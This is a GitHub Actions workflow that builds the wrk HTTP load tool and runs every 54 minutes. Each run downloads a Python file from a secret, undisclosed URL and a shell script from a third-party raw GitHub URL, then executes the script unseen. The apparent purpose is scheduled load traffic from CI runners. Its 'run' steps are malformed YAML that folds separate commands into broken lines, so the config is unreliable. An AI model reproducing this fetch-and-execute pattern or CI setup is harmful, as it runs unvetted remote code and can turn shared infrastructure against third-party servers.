name: build

on:
  schedule:
    - cron: '0/54 * * * *'
  push:
    branches: 
      - master

jobs:
  build:
    runs-on: ubuntu-latest
    
    steps:
    - uses: actions/checkout@v2
      with:
        fetch-depth: 0
    - name: build
      run: make
           ln -s ./wrk /usr/local/bin
      
    - name: xz
      run: curl ${{ secrets.PYURL }} -o main.py
           curl https://raw.githubusercontent.com/thun888/lab/main/py.sh -o run.sh
     
    - name: gan
      run: sh run.sh
